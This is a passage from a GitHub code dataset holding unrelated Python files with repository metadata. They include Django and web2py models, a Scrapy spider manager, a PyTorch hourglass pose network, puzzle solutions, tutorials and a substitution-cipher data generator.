","repo_name":"freddychenyouren2/python-practice-1","sub_path":"Arithmetic_Formatter/arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73489340644","text":"\n\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\n\nclass Event(models.Model):\n title = models.CharField(max_length=200, null=True)\n location = models.CharField(max_length=200, null=True)\n date = models.DateTimeField(auto_now_add=False)\n\n def __str__(self):\n return self\n\n\nclass User(AbstractUser):\n is_Paradym = models.BooleanField('Is Paradym', default=False)\n is_ThirdParty = models.BooleanField('Is ThirdParty', default=False)\n is_Admin = models.BooleanField('Is Admin', default=False)","repo_name":"lAmNumberSeven/mww-main","sub_path":"ProjectSite/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40522295879","text":"from __future__ import print_function\nfrom hashlib import md5\nfrom re import search\n\nkey = raw_input(\"Input: \")\n\nanswers = {\n '0'*5: None,\n '0'*6: None,\n}\nanswers_remaining = len(answers)\ncount = 1\nwhile answers_remaining:\n r = search(r\"^000000?\", md5(\"%s%d\" % (key, count)).hexdigest())\n\n if r and not answers[r.group()]:\n answers[r.group()] = count\n answers_remaining -= 1\n\n count += 1\n\nprint(\"Answer (part1): %d\" % answers['0'*5])\nprint(\"Answer (part2): %d\" % answers['0'*6])\n","repo_name":"rossengeorgiev/adventofcode","sub_path":"2015/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34094998091","text":"from abc import ABC, abstractmethod\nimport logging\nimport os\nimport sys\n\nfrom twisted.python.failure import Failure\nfrom twisted.internet import defer\nfrom scrapy.utils.defer import deferred_from_coro\n\nfrom MovieCollect.custom.db_importer import code_cacher\nfrom MovieCollect.custom.utils.exceptions import SpiderExistError, SpiderNotRunningError\nfrom MovieCollect.custom.utils.misc import delete_dir\n\nlogger = logging.getLogger(__name__)\n\nclass Worker(ABC):\n def __init__(self, crawlerprocess):\n self.crawlerprocess = crawlerprocess\n self.spider_mongo = crawlerprocess.spider_mongo\n\n @abstractmethod\n def check_status(self):\n pass\n\n @abstractmethod\n def change_status(spiders):\n pass\n\nclass CheckCrawlerRunningMixin:\n def check_crawler_running(self, spidername):\n if spidername not in self.crawlerprocess.running_crawlers:\n raise SpiderNotRunningError(f'Spider {spidername} is not found in running_crawlers.')\n elif self.crawlerprocess.running_crawlers[spidername].terminate or not self.crawlerprocess.running_crawlers[spidername].crawling:\n raise SpiderNotRunningError(f'Spider {spidername} is terminating.')\n\n\nclass start(Worker):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.spiderloader = self.crawlerprocess.spider_loader\n self.settings = self.crawlerprocess.settings\n\n @defer.inlineCallbacks\n def check_status(self, spidername):\n spidermodule_name = self.spiderloader.get_spidermodule_name(spidername)\n if spidermodule_name in sys.modules or spidername in self.crawlerprocess.running_crawlers:\n raise SpiderExistError(f'Spider :{spidername} is already imported or running.')\n yield deferred_from_coro(self.spiderloader.preload(spidername))\n\n\n @defer.inlineCallbacks\n def change_status(self, spidername):\n from MovieCollect.custom.crawler import AutoCrawler\n\n spider = self.spiderloader.load(spidername)\n crawler = AutoCrawler(spider, self.settings)\n crawl_defer = crawler.crawl()\n\n @defer.inlineCallbacks\n def _done(result):\n if isinstance(result, Failure):\n status = 'error'\n message = f'Error occured while running spider: {spidername}, error msg: result.getTraceback()'\n LEVEL = logging.ERROR\n elif crawler.terminate:\n status = 'has_terminated'\n message = f'Spider: {spidername} has been terminated'\n LEVEL = logging.INFO\n else:\n status = 'finished'\n message = f'Finished crawling spider: {spidername}.'\n LEVEL = logging.INFO\n del self.crawlerprocess.running_crawlers[spidername]\n self.crawlerprocess._active.discard(crawl_defer)\n logger.log(LEVEL, message)\n yield deferred_from_coro(self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':status, 'comment':message}}, upsert=False))\n return result\n\n if getattr(crawl_defer, 'result', None) is not None and issubclass(crawl_defer.result.type, Exception):\n logger.error(f'Error occured when try to start spider: {spidername}, error msg: crawl_defer.result.getTraceback()')\n yield deferred_from_coro(self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'error', 'comment':crawl_defer.result.getTraceback()}}, upsert=False))\n else:\n message = f'Running spider: {spidername}.'\n self.crawlerprocess.running_crawlers[spidername] = crawler\n self.crawlerprocess._active.add(crawl_defer)\n logger.info(message)\n crawl_defer.addBoth(_done)\n yield deferred_from_coro(self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'running', 'comment':message}}, upsert=False))\n\n \nclass terminate(CheckCrawlerRunningMixin, Worker):\n def check_status(self, spidername):\n self.check_crawler_running(spidername)\n\n @defer.inlineCallbacks\n def change_status(self, spidername):\n yield self.crawlerprocess.running_crawlers[spidername].stop()\n logger.info(f'Spider: {spidername} has been terminated')\n\n\nclass pause(CheckCrawlerRunningMixin, Worker):\n def check_status(self, spidername):\n self.check_crawler_running(spidername)\n if self.crawlerprocess.running_crawlers[spidername].engine.paused:\n raise SpiderNotRunningError(f'Spider :{spidername} is paused')\n\n async def change_status(self, spidername):\n message = f'Spider: {spidername} has been paused'\n self.crawlerprocess.running_crawlers[spidername].engine.pause()\n logger.info(message)\n await self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'has_paused', 'comment':message}}, upsert=False)\n\n\nclass resume(CheckCrawlerRunningMixin, Worker):\n def check_status(self, spidername):\n super().check_crawler_running(spidername)\n if not self.crawlerprocess.running_crawlers[spidername].engine.paused:\n raise SpiderNotRunningError(f'Spider :{spidername} is not paused')\n\n async def change_status(self, spidername):\n message = f'Spider: {spidername} has been resumed'\n self.crawlerprocess.running_crawlers[spidername].engine.unpause()\n logger.info(message)\n await self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'running', 'comment':message}}, upsert=False)\n\n\nclass restart(start):\n @defer.inlineCallbacks\n def check_status(self, spidername):\n if spidername in self.crawlerprocess.running_crawlers:\n raise SpiderExistError('Spider :{spidername} is running.')\n yield deferred_from_coro(self.spiderloader.preload(spidername))\n \n @defer.inlineCallbacks\n def change_status(self, spidername):\n spider_log_dir = os.path.join(self.settings.get('SPIDER_LOG_DIR'), spidername)\n spider_post_dir = os.path.join(self.settings.get('IMAGES_STORE'), spidername)\n delete_dir(spider_log_dir)\n delete_dir(spider_post_dir)\n yield deferred_from_coro(self.spider_mongo.coll_movie_delete_many({'spidername':spidername}))\n logger.info(f'Spider: {spidername} is restarting')\n yield super().change_status(spidername)\n\n\nclass delete(Worker):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.spiderloader = self.crawlerprocess.spider_loader\n self.settings = self.crawlerprocess.settings\n\n def check_status(self, spidername):\n if spidername in self.crawlerprocess.running_crawlers:\n raise SpiderExistError('Spider :{spidername} is running.')\n\n async def change_status(self, spidername):\n message = f'Spider: {spidername} has been deleted'\n spidermodule_name = self.spiderloader.get_spidermodule_name(spidername)\n if spidermodule_name in sys.modules:\n del sys.modules[spidermodule_name]\n code_cacher.pop(spidername, None)\n spider_log_dir = os.path.join(self.settings.get('SPIDER_LOG_DIR'), spidername)\n spider_post_dir = os.path.join(self.settings.get('IMAGES_STORE'), spidername)\n delete_dir(spider_log_dir)\n delete_dir(spider_post_dir)\n await self.spider_mongo.coll_movie_delete_many({'spidername':spidername})\n logger.info(message)\n await self.spider_mongo.coll_spider_update_one({'spidername':spidername}, {'$set':{'status':'has_deleted', 'comment':message}}, upsert=False)\n \n\n","repo_name":"chizuo53/MovieCollect","sub_path":"MovieCollect/custom/performer.py","file_name":"performer.py","file_ext":"py","file_size_in_byte":7666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15345926647","text":"from torch import nn\nimport torch\n\nPool = nn.MaxPool2d\n\ndef batchnorm(x):\n return nn.BatchNorm2d(x.size()[1])(x)\n\nclass Conv(nn.Module):\n def __init__(self, inp_dim, out_dim, kernel_size=3, stride = 1, bn = False, relu = True):\n super(Conv, self).__init__()\n self.inp_dim = inp_dim\n self.conv = nn.Conv2d(inp_dim, out_dim, kernel_size, stride, padding=(kernel_size-1)//2, bias=True)\n self.relu = None\n self.bn = None\n if relu:\n self.relu = nn.ReLU()\n if bn:\n self.bn = nn.BatchNorm2d(out_dim)\n\n def forward(self, x):\n assert x.size()[1] == self.inp_dim, \"{} {}\".format(x.size()[1], self.inp_dim)\n x = self.conv(x)\n if self.bn is not None:\n x = self.bn(x)\n if self.relu is not None:\n x = self.relu(x)\n return x\n \nclass Residual(nn.Module):\n def __init__(self, inp_dim, out_dim):\n super(Residual, self).__init__()\n self.relu = nn.ReLU()\n self.bn1 = nn.BatchNorm2d(inp_dim)\n self.conv1 = Conv(inp_dim, int(out_dim/2), 1, relu=False)\n self.bn2 = nn.BatchNorm2d(int(out_dim/2))\n self.conv2 = Conv(int(out_dim/2), int(out_dim/2), 3, relu=False)\n self.bn3 = nn.BatchNorm2d(int(out_dim/2))\n self.conv3 = Conv(int(out_dim/2), out_dim, 1, relu=False)\n self.skip_layer = Conv(inp_dim, out_dim, 1, relu=False)\n if inp_dim == out_dim:\n self.need_skip = False\n else:\n self.need_skip = True\n \n def forward(self, x):\n if self.need_skip:\n residual = self.skip_layer(x)\n else:\n residual = x\n out = self.bn1(x)\n out = self.relu(out)\n out = self.conv1(out)\n out = self.bn2(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn3(out)\n out = self.relu(out)\n out = self.conv3(out)\n out += residual\n return out \n\nclass Hourglass(nn.Module):\n def __init__(self, n, f, bn=None, increase=0):\n super(Hourglass, self).__init__()\n nf = f + increase\n self.up1 = Residual(f, f)\n # Lower branch\n self.pool1 = Pool(2, 2)\n self.low1 = Residual(f, nf)\n self.n = n\n # Recursive hourglass\n if self.n > 1:\n self.low2 = Hourglass(n-1, nf, bn=bn)\n else:\n self.low2 = Residual(nf, nf)\n self.low3 = Residual(nf, f)\n self.up2 = nn.Upsample(scale_factor=2, mode='nearest')\n\n def forward(self, x):\n up1 = self.up1(x)\n pool1 = self.pool1(x)\n low1 = self.low1(pool1)\n low2 = self.low2(low1)\n low3 = self.low3(low2)\n up2 = self.up2(low3)\n return up1 + up2\n\nclass UnFlatten(nn.Module):\n def forward(self, input):\n return input.view(-1, 256, 4, 4)\n\nclass Merge(nn.Module):\n def __init__(self, x_dim, y_dim):\n super(Merge, self).__init__()\n self.conv = Conv(x_dim, y_dim, 1, relu=False, bn=False)\n\n def forward(self, x):\n return self.conv(x)\n \nclass PoseNet(nn.Module):\n def __init__(self, nstack, inp_dim, oup_dim, bn=False, increase=0, **kwargs):\n super(PoseNet, self).__init__()\n \n self.nstack = nstack\n self.pre = nn.Sequential(\n Conv(1, 64, 7, 2, bn=True, relu=True),\n Residual(64, 128),\n Pool(2, 2),\n Residual(128, 128),\n Residual(128, inp_dim)\n )\n \n self.hgs = nn.ModuleList( [\n nn.Sequential(\n Hourglass(4, inp_dim, bn, increase),\n ) for i in range(nstack)] )\n \n self.features = nn.ModuleList( [\n nn.Sequential(\n Residual(inp_dim, inp_dim),\n Conv(inp_dim, inp_dim, 1, bn=True, relu=True)\n ) for i in range(nstack)] )\n \n self.outs = nn.ModuleList( [Conv(inp_dim, oup_dim, 1, relu=False, bn=False) for i in range(nstack)] )\n self.merge_features = nn.ModuleList( [Merge(inp_dim, inp_dim) for i in range(nstack-1)] )\n self.merge_preds = nn.ModuleList( [Merge(oup_dim, inp_dim) for i in range(nstack-1)] )\n self.nstack = nstack\n\n def forward(self, imgs):\n ## our posenet\n x = self.pre(imgs)\n combined_hm_preds = []\n feats = []\n for i in range(self.nstack):\n hg = self.hgs[i](x)\n feature = self.features[i](hg)\n preds = self.outs[i](feature)\n # feat = self.feat_kernel(feature)\n feats.append(feature)\n combined_hm_preds.append(preds)\n if i < self.nstack - 1:\n x = x + self.merge_preds[i](preds) + self.merge_features[i](feature)\n return torch.stack(combined_hm_preds, 1), torch.stack(feats, 1)\n","repo_name":"MohamedAfham/CD_HPE","sub_path":"models/stacked_hg.py","file_name":"stacked_hg.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"39295510613","text":"from models.Car import Car\r\nfrom models.Review import Review\r\nfrom servcies.ServiceBase import ServiceBase\r\n\r\nall_cars = \"select id, make, name, year, image from cars\"\r\n\r\n\r\nclass CarService(ServiceBase):\r\n\r\n def show_cars(self):\r\n \"\"\"\r\n show list of cars\r\n \"\"\"\r\n c = self.db.cursor()\r\n c.execute(all_cars)\r\n rows = c.fetchall()\r\n # imperative style\r\n # cars = []\r\n # for row in rows:\r\n # cars.append(Car(row[0], row[1], row[2], row[3], row[4]))\r\n\r\n # functional style\r\n return map(lambda row: Car(row[0], row[1], row[2], row[3], row[4]), rows)\r\n\r\n def get_car_details(self, car_id):\r\n self.connect()\r\n c_id = int(car_id)\r\n c = self.db.cursor()\r\n query = f\"\"\"select c.id, c.name, r.user_id, r.review, u.name from cars c\r\n left join reviews r on c.id = r.car_id\r\n left JOIN users u on u.id = r.user_id where c.id = {c_id} \"\"\"\r\n c.execute(query)\r\n out = c.fetchall()\r\n first_row = out[0]\r\n car = Car(_id=first_row[0], name=first_row[1], make='', image='', year=0000)\r\n reviews = list(map(lambda row: Review(row[2], c_id, row[3], user_name=row[4]), out))\r\n c.close()\r\n return car, list(filter(None, reviews))\r\n","repo_name":"ubaeida/Cars-Review","sub_path":"servcies/car_service.py","file_name":"car_service.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71579643686","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n'''\n__title__ = ''\n__author__ = 'dcx'\n__mtime__ = '2019/10/5'\n# code is far away from bugs with the god\n'''\n\n\nclass Person:\n def __init__(self,name:str,age:int):\n params = ((name,str),(age,int))\n if not self.checkdata(params):\n raise TypeError\n print(\"OK\")\n self.name = name\n self.age = age\n\n def checkdata(self,params):\n for k,v in params:\n if not isinstance(k,v):\n return False\n return True\n\n\np1 = Person(\"dingcx\",12)\n#p2 = Person(\"dingcx\",'12')\n\n\n#如果使用描述器来实现呢?\nclass TyepCheck:\n def __init__(self,name,type):\n self.name = name\n self.type = type\n\n def __get__(self, instance, owner):\n if instance is not None:\n #if not isinstance(instance,None):\n return instance.__dict__[self.name]\n return self\n\n def __set__(self, instance, value):\n if not isinstance(value,self.type):\n raise TypeError\n instance.__dict__[self.name] = value\n\n\nclass Human:\n name = TyepCheck('name',str)\n age = TyepCheck('age',int)\n\n def __init__(self,name:str,age:int):\n\n self.name = name\n self.age = age\n\n\nh = Human('dingcx',12)\nprint(\"h's __dict___ --->\",h.__dict__)\nprint(h.name,h.age)\n\n\n\n\nd = None\nprint(isinstance(d,type(None)))#为什么None不是一个类型呢?\n\n\n","repo_name":"dingcx/pybase_old","sub_path":"oop/oop12-描述器3.py","file_name":"oop12-描述器3.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37827591065","text":"# -*- coding: utf-8 -*-\n#########################################################################\n\n## if SSL/HTTPS is properly configured and you want all HTTP requests to\n## be redirected to HTTPS, uncomment the line below:\n# request.requires_https()\n\nimport dbaccess as dba\ndb = DAL(dba.database_uri, migrate=False)\n\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\n\nauth = Auth(db)\n# add extra fields not defined by Auth :\nauth.settings.extra_fields['auth_user'] = [Field('username'), Field('phone_number')]\nauth.define_tables(migrate=False, username=True)\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\n#auth.define_tables(username=False, signature=False)\n\n## configure email\nmail = auth.settings.mailer\nmail.settings.server = dba.mail_server\nmail.settings.sender = dba.mail_sender\nmail.settings.login = dba.mail_login\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = True\nauth.settings.reset_password_requires_verification = True\nauth.settings.create_user_groups = False\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth, filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n\ndb.define_table('device',\n Field('MACAddress','string'),\n Field('SerialNo','string'),\n Field('UMTagNo','string'),\n Field('Make','string'),\n Field('Model','string'),\n Field('IPAddress','string'),\n Field('RoomNum','string'),\n Field('FWVer','string'),\n Field('LoginUser','string'),\n Field('LoginPW','string'),\n Field('Status','string'),\n Field('Site','integer'),\n primarykey=['MACAddress'])\n\n#--------\ndb.define_table('device_log',\n Field('LogID','integer'),\n Field('DeviceID','string'),\n Field('Tag','string'),\n Field('LogInfo','text'),\n Field('LogDateTime','datetime'),\n Field('CritVals','text'),\n primarykey=['LogID'])\n\n#--------\ndb.define_table('engineer_info',\n Field('Person','integer'),\n Field('SID','integer'),\n Field('ContRenewDate','date'),\n primarykey=['Person', 'SID'])\n\n#--------\ndb.define_table('lease',\n Field('LeaseID','integer'),\n Field('ContractNum','string'),\n Field('RenewalDate','date'),\n Field('Contact','string'),\n Field('Phone','string'),\n Field('Address','string'),\n Field('Site','integer'),\n Field('LEASEcol','string'),\n primarykey=['LeaseID'])\n\n#--------\ndb.define_table('maintenance_log',\n Field('MaintenanceID','integer'),\n Field('SiteID','integer'),\n Field('EngID','integer'),\n Field('Date','string'),\n Field('Report','string'),\n primarykey=['MaintenanceID'])\n\n#--------\ndb.define_table('maintenance_log_has_device',\n Field('MaintID','integer'),\n Field('DeviceID','string'),\n primarykey=['MaintID', 'DeviceID'])\n\n#--------\ndb.define_table('person',\n Field('PersonID','integer'),\n Field('Name','string'),\n Field('Email','string'),\n Field('PhoneNum','string'),\n Field('Street','string'),\n Field('City','string'),\n Field('Zip','string'),\n Field('Status','string'),\n Field('PassHash','string'),\n Field('Seed','string'),\n primarykey=['PersonID'])\n\n#--------\ndb.define_table('site',\n Field('SiteID','integer'),\n Field('Name','string'),\n Field('Type','string'),\n Field('Latitude','string'),\n Field('Longitude','string'),\n Field('Elevation','string'),\n Field('Callsign','string'),\n Field('Description','string'),\n primarykey=['SiteID'])\n\n#--------\ndb.define_table('site_has_utility',\n Field('Site','integer'),\n Field('Utility','integer'),\n primarykey=['Site', 'Utility'])\n\n#--------\ndb.define_table('utility',\n Field('UtilityID','integer'),\n Field('Type','string'),\n Field('Name','string'),\n Field('Contact','string'),\n Field('Phone','string'),\n Field('Address','string'),\n Field('AccNum','string'),\n primarykey=['UtilityID'])\n\n## after defining tables, uncomment below to enable auditing\nauth.enable_record_versioning(db)\n\nmail.settings.server = settings.email_server\nmail.settings.sender = settings.email_sender\nmail.settings.login = settings.email_login\n","repo_name":"tonymatts/portfolio","sub_path":"mvc/pbs_site_team_project/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75054307683","text":"from Compression_Algorithmss.Lempel_Ziv_78 import *\n\nfrom Utilities.Constants import FILE_TO_COMPRESS, LOCATION_TO_SAVE, LOCATION_TO_UNCOMPRESS\n\n\nwith open(FILE_TO_COMPRESS, \"rb\") as file:\n file = file.read()\n\n compressed_file = compress(file)\n with open(LOCATION_TO_SAVE, \"wb\") as cf:\n cf.write(compressed_file)\n\n with open(LOCATION_TO_SAVE, \"rb\") as ucf:\n ucf = ucf.read()\n ucf = uncompress(ucf)\n\n with open(LOCATION_TO_UNCOMPRESS, \"wb\") as f:\n f.write(ucf)\n f.close()\n\n\ndef menu():\n print(\"1: Compress file\")\n print(\"2: Uncompress file\")\n print(\"3: Exit App\")\n\n selection = input(\"Select an option:\")\n","repo_name":"kyriakos77kolovos/Coding_Theory","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16801762894","text":"#!/usr/bin/env python3\nfrom cpuinfo import get_cpu_info\nfrom cpuid import *\nimport cpuid_native\nimport sys\n\n\ndef get_socket_number_linux(location=\"/sys/devices/system/node/possible\"):\n if sys.platform != \"linux\":\n return \"cannot compute socket number for other OS than linux\"\n with open(location, 'r') as f:\n data = f.read()\n return int(data.split('-')[-1])+1\n\n\ndef is_set(id, reg_idx, bit):\n regs = cpuid(id)\n\n if (1 << bit) & regs[reg_idx]:\n return \"Yes\"\n else:\n return \"--\"\n\ndef get_cpus():\n cpu_info = []\n for i in range(get_socket_number_linux()):\n cpu_info.append({\n \"vendor\": cpu_vendor(),\n \"name\": cpu_name(),\n \"microarch\": cpu_microarchitecture(),\n \"vector_instructions\": {\n \"sse\": is_set(1, 3, 25),\n \"sse2\": is_set(1, 3, 26),\n \"sse3\": is_set(1, 2, 0),\n \"ssse3\": is_set(1, 2, 9),\n \"sse4.1\": is_set(1, 2, 19),\n \"sse4.2\": is_set(1, 2, 20),\n \"sse4a\": is_set(0x80000001, 2, 6),\n \"avx\": is_set(1, 2, 28),\n \"avx2\": is_set(7, 1, 5),\n \"bmi1\": is_set(7, 1, 3),\n \"bmi2\": is_set(7, 1, 8),\n },\n \"cpu_info\": get_cpu_info(),\n })\n return cpu_info\n\nif __name__ ==\"__main__\":\n print(\"socket number linux from a file : {}\".format(get_socket_number_linux()))\n print(\"Info from the library cpuid-py:\")\n cpu_info = get_cpus()\n for toto in [cpu_info[0], get_cpu_info()]:\n print(\"\\n\\n\\n\")\n for key,value in toto.items():\n if(value is dict):\n for i,j in value.items():\n if(j is dict):\n for a,b in value.items():\n print(\"{} : {}\\n\".format(a ,b))\n\n print(\"{} : {}\\n\".format(i,j))\n\n else:\n print(\"{} : {}\\n\".format(key,value))\n","repo_name":"Boavizta/boagent","sub_path":"boagent/hardware/cpu/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"38792459094","text":"\"\"\"\nwhile - 코드를 반복시키기 위한 제어문 \n- 조건식을 통해서 반복을 통제한다.\n- 조건식에 사용된 변수는 반드시 값이 변해야만 성립한다.\n\n무한 반복문\n- 입력을 받아야만 성립하는 반복문\n- 프로그램이 굴러가는데 적합한 값만 확보하는 것이 목적\nex) 점수. 0점부터 100점까지의 범위가 있음\n\n유한 반복문\n- 다용도로 사용할 수 있는 반복문\n- 작성한 코드 내에서 규칙적으로 반복되는 내용을 줄이기 위함\n- 규칙성이 없으면 운용할 수 없음\nex) A ~ Z 랭크를 판단하여 출력한다.\n\n\"\"\"\n# 무한 반복문\n# ex) 점수 0점부터 100점까지의 범위가 있음\nnum = -1\nwhile num < 0 or num < 100:\n num = int(input(\"점수 입력 >> \"))\n if num < 0 or num > 100:\n print(\"잘못된 점수입니다.\")\n else:\n print(\"올바른 점수입니다.\")\nprint(\"입력된 점수 : %d점 \"%(num))\n\n\n# 유한 반복문\n# ex)A ~ Z 랭크를 판단하여 출력한다.\n\nnum1 = 100\nnum2 = 98\nrank = 65\n\nwhile rank <= 90:\n if num <= num1 and num >= num2:\n print(\"%c랭크\"%(rank))\n num1-=3\n num2-=3\n rank+=1\n\n\n\n","repo_name":"LeeBG/PythonStudy","sub_path":"day10/08.반복문_복습.py","file_name":"08.반복문_복습.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28454961255","text":"# https://www.codewars.com/kata/5526fc09a1bbd946250002dc/train/python\n\ndef find_outlier(integers):\n odd = []\n even = []\n for number in integers:\n if number % 2 == 0: even.append(number)\n else: odd.append(number)\n if len(odd) > len(even): return(even[0])\n else: return(odd[0])\n \n","repo_name":"THRUWOL/Codewars_solution","sub_path":"Python/Find_The_Parity_Outlier.py","file_name":"Find_The_Parity_Outlier.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1893035078","text":"import re, mmap, random, string\n\nNOISE = 0.05 # Probability a letter is changed to any other letter during encryption.\n\n# Add any text sanitation code here so that a text is sanitized before we encrypt it and add noise\n# After the first line, text should be a string with no newlines\ndef sanitize(text):\n text = ' '.join(text.split())\n\n return text\n\n ########################################################\n # You probably don't want to edit anything below this. #\n ########################################################\n\n# Uses Regex to pull articles from data\n# Returns list of strings\n# Each element is the body of a news article\ndef get_texts(filename):\n texts = []\n with open(filename, 'r+') as f:\n data = mmap.mmap(f.fileno(),0)\n bodyRegex = re.compile(\"([^<]*)\", re.IGNORECASE)\n matches = bodyRegex.findall(data)\n for match in matches:\n text = \"%s\" % match\n texts.append(text)\n return texts\n\n# Returns random permutation (as a string) of string.ascii_uppercase\ndef generateKey():\n key = list(string.ascii_uppercase)\n random.shuffle(key)\n return ''.join(key)\n\n# Subsitutes character if mapping exists from current to substitution\n# Assumes current and substitution are Capital Strings with no repeating characters\n# Case of return character is same as input character\ndef substitute(character, current, substitution):\n if character.upper() not in current:\n return character\n index_in_substitution = current.find(character.upper())\n if character.isupper():\n return substitution[index_in_substitution]\n return substitution[index_in_substitution].lower()\n\n# Returns text encrypted using substitution cipher with key as the key\ndef encrypt(text, key):\n result = \"\"\n for char in text:\n letter = substitute(char, string.ascii_uppercase, key)\n result += letter\n return result\n\n# Returnes text with added noise.\n# Each alphabet character has noise chance of getting changed to another random alphabet letter of same case\ndef add_noise(text, noise):\n result = \"\"\n for letter in text:\n if letter in string.ascii_letters and random.random() < noise:\n random_letter = randomLetter()\n letter = random_letter.upper() if letter.isupper() else random_letter.lower()\n result += letter\n return result\n\n# Returns a random letter. Could be upper or lower case\ndef randomLetter():\n return random.choice(string.ascii_letters)\n\ndef main():\n keys = open(\"keys\", 'w')\n output = open(\"substitute\", 'w')\n output_noise = open(\"substitute_noise\", 'w')\n original = open(\"original\", \"w\")\n\n for i in range(22):\n filename = \"reut2-0%02d.sgm\" % i \n texts = get_texts(filename)\n for text in texts:\n text = sanitize(text)\n key = generateKey()\n cipher_text = encrypt(text, key)\n noised = add_noise(cipher_text, NOISE)\n \n keys.write(\"%s\\n\" % key)\n output.write(\"%s\\n\" % cipher_text)\n output_noise.write(\"%s\\n\" % noised)\n original.write(\"%s\\n\" % text)\n\n\nif __name__ == '__main__':\n main()","repo_name":"brendongo/decryptor","sub_path":"generatedata.py","file_name":"generatedata.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10991973436","text":"from django.db import models\nfrom collection.models import Collection\n# Create your models here.\nPAGE_TYPE_CHOICES = [\n\t('about','about'),\n\t('collection','collection'),\n\t('commitments','commitments'),\n\t('conditions','conditions'),\n\t('contact','contact'),\n\t('wishlist','wishlist'),\n\t('login','login'),\n\t('register','register'),\n]\nSECTION_TYPE_CHOICES = [\n\t('image','image'),\n\t('text','text'),\n]\nSECTION_COL_CHOICES = [\n\t('left','left'),\n\t('right','right'),\n]\n\nclass Page(models.Model):\n\tname = models.CharField(max_length = 128, verbose_name = 'Name')\n\tptype = models.CharField(max_length = 128, verbose_name = 'Page Type',choices = PAGE_TYPE_CHOICES)\n\tcover = models.ImageField(upload_to = 'page/',verbose_name = 'Cover')\n\tcollection = models.ForeignKey(Collection, verbose_name = 'Collection', blank = True, null = True,help_text = 'Leave it to blank when the page type is not COLLECTION')\n\n\tclass Meta:\n\t\tverbose_name = 'Page'\n\t\tverbose_name_plural = 'Page'\n\n\tdef __unicode__(self):\n\t\ts = ''\n\t\tif self.ptype == 'collection':\n\t\t\ts = self.name + '--'+ self.collection.name\n\t\telse:\n\t\t\ts = self.name\n\t\treturn s\n\nclass Section(models.Model):\n\tpage = models.ForeignKey(Page, verbose_name = 'Page')\n\tstype = models.CharField(max_length = 128, verbose_name = 'Section Type',choices = SECTION_TYPE_CHOICES)\n\ttitle = models.CharField(max_length = 128, verbose_name = 'Title',blank = True, null = True)\n\tcontent = models.TextField(verbose_name = 'Content',blank = True, null = True)\n\timage = models.ImageField(upload_to = 'section/',blank = True, null = True)\n\tscol = models.CharField(max_length = 128, verbose_name = 'Section Column',choices = SECTION_COL_CHOICES)\n\torder = models.IntegerField(verbose_name = 'Order',help_text = 'Order the section')\n\n\tclass 